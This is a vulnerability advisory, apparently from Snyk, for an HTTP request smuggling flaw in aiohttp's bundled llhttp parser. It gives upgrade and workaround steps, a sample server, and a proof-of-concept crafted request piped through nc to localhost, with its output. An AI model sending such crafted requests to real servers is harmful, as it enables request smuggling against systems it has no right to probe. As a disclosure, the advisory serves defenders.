Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade aiohttp
to version 3.8.5 or higher.
Affected versions of this package are vulnerable to HTTP Request Smuggling in that aiohttp
is bundled with llhttp v6.0.6, which is vulnerable to CVE-2023-30589. The vulnerable code is used by aiohttp
for its HTTP request parser, when available, which is the default case when installing from a wheel.
Note
This vulnerability only affects users of aiohttp
as an HTTP server (i.e. aiohttp.Application
). Users are not affected by this vulnerability if they use aiohttp
as an HTTP client library (i.e. aiohttp.ClientSession
).
Users who are unable to upgrade to the fixed version can reinstall the library using AIOHTTP_NO_EXTENSIONS=1
as an environment variable to disable the llhttp HTTP request parser implementation. The pure Python implementation isn't vulnerable to request smuggling:
$ python -m pip uninstall --yes aiohttp
$ AIOHTTP_NO_EXTENSIONS=1 python -m pip install --no-binary=aiohttp --no-cache aiohttp
from aiohttp import web
async def example(request: web.Request):
headers = dict(request.headers)
body = await request.content.read()
return web.Response(text=f"headers: {headers} body: {body}")
app = web.Application()
app.add_routes([web.post('/', example)])
web.run_app(app)
Sending a crafted HTTP request will cause the server to misinterpret one of the HTTP header values leading to HTTP request smuggling.
$ printf "POST / HTTP/1.1\r\nHost: localhost:8080\r\nX-Abc: \rxTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\n0\r\n\r\n" \ | nc localhost 8080
Expected output: headers: {'Host': 'localhost:8080', 'X-Abc': '\rxTransfer-Encoding: chunked'} body: b''
Actual output (note that 'Transfer-Encoding: chunked' is an HTTP header now and body is treated differently) headers: {'Host': 'localhost:8080', 'X-Abc': '', 'Transfer-Encoding': 'chunked'} body: b'A'